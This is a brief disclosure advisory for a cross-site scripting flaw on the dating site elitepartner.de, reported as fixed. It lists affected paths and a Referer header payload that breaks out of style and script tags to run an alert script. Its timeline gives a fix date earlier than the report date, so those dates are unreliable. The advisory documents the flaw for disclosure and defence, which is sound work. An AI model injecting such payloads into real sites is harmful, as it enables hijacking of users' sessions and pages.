Advisory:		www.elitepartner.de - Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2012-024
Author:			Stefan Schurtz
Affected Software:	Successfully tested on www.elitepartner.de
Vendor URL:		http://www.elitepartner.de
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

http://www.elitepartner.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/

Referer: '"></style></script><script>alert(/huh/)</script>

==========================
Solution
==========================

fixed

==========================
Disclosure Timeline
==========================

23-Dec-2012 - informed by contact form
10-Jan-2012 - fixed by developer

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt